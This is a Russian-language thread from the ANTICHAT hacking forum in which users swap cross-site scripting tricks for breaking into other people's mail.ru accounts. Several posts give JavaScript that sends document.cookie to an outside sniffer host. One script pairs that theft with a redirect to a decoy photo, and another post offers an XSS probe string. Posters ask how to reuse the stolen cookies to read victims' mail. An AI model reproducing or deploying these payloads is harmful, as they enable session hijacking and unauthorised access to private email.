HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.01.2010, 01:00
Mirat_sc1
Новичок
Регистрация: 12.01.2010
Сообщений: 1
С нами: 8594966

Репутация: 0
По умолчанию

сори за глупость ! нокак это сделать ???

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif?"+document.cookie;
 
Ответить с цитированием

  #2  
Старый 12.01.2010, 01:00
inc
Новичок
Регистрация: 13.03.2009
Сообщений: 23
С нами: 9033052

Репутация: 5
По умолчанию

Цитата:

Сообщение от kamikadze1988

Я смог получить куки, но изображение открывается только в IE, в опере и фаерфоксе не открывается, соответственно куки не приходят.
Не подскажите в чём дело?

незнаю попробуй поменять ссылку на картинку.. (картинку вставь другую):turned:
 
Ответить с цитированием

  #3  
Старый 12.01.2010, 01:00
noxcho
Новичок
Регистрация: 11.01.2010
Сообщений: 5
С нами: 8596406

Репутация: 0
По умолчанию

Народ такая проблема есть ,может не по теме но голову скоро разобю об стену, короче скачал прогу TINY XSS scanner ввел адресс _http:mail.ru_
и уже 10 час жду уязвимый XSS. Как проще ручкали искать объяснит кто нибудь ламеру а лучше видео пусть сделает.
 
Ответить с цитированием

  #4  
Старый 12.01.2010, 01:00
Meloman
Участник форума
Регистрация: 04.05.2010
Сообщений: 121
С нами: 8432642

Репутация: 3
По умолчанию

Цитата:

Сообщение от noxcho

Народ такая проблема есть ,может не по теме но голову скоро разобю об стену, короче скачал прогу TINY XSS scanner ввел адресс _http:mail.ru_
и уже 10 час жду уязвимый XSS. Как проще ручкали искать объяснит кто нибудь ламеру а лучше видео пусть сделает.

программой не найдеш =) особенно на майл ру)

ручками можеш поимкать с помощью этого скрипта
">alert()
вставляеш его после первого знака = в адресной строке.
И еще в строчки где есть запрос на отправку
 
Ответить с цитированием

  #5  
Старый 14.01.2010, 01:00
PioNeeRkin
Новичок
Регистрация: 14.01.2010
Сообщений: 2
С нами: 8592086

Репутация: 0
По умолчанию

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...
 
Ответить с цитированием

  #6  
Старый 14.01.2010, 01:00
vista1x
Новичок
Регистрация: 12.12.2009
Сообщений: 1
С нами: 8638533

Репутация: 0
По умолчанию

вообщем такая хрень у меня
делаю всё как сдесь.. куки приходят, всё норм
но когда сую куки в оперу, почта не открывается
что делать ?
 
Ответить с цитированием

  #7  
Старый 15.01.2010, 01:00
noxcho
Новичок
Регистрация: 11.01.2010
Сообщений: 5
С нами: 8596406

Репутация: 0
По умолчанию

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст
 
Ответить с цитированием

  #8  
Старый 15.01.2010, 01:00
vik76
Участник форума
Регистрация: 12.05.2009
Сообщений: 206
С нами: 8947766

Репутация: 51
По умолчанию

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст

с пассивкой можно сделать редирект на открытку:wink: чел смотрит фотку ты смотришь его почту:turned:
 
Ответить с цитированием

  #9  
Старый 16.01.2010, 01:00
inc
Новичок
Регистрация: 13.03.2009
Сообщений: 23
С нами: 9033052

Репутация: 5
По умолчанию

Цитата:

Сообщение от PioNeeRkin

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...

куки на сниффере! в разделе "лог"

Добавлено через 10 минут

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет

Не знаю, у меня на майле все отлично работает =)
 
Ответить с цитированием

  #10  
Старый 20.01.2010, 01:00
PROTEST
Новичок
Регистрация: 20.01.2010
Сообщений: 4
С нами: 8583446

Репутация: 0
По умолчанию

Всем привет.
Я тут новенький.
и хотел узнать свои ошибки.
1. вот JavaScript код с редиректом

img = new Image(); img.src = "http://httpz.ru/nh91eusq512.gif?"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://de.fishki.net/picsw/012010/20/post/devushki/tn.jpg"
var speed = 3000; // редирект через 3 секунды
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

куки вообще не приходят, прихотит ip и info о браузере.

2. делал просто JavaScript код

javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nh91eusq512.gif?"+document.cookie;')

куки приходят но когда я заменяю свои то не попадаю на почту.

кто подскажет как на mail попасть ?

3. я смогу посмореть почту после манипуляции с куки только когда жертва онлайн?
или в любой момент и даже через день или 2 ?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.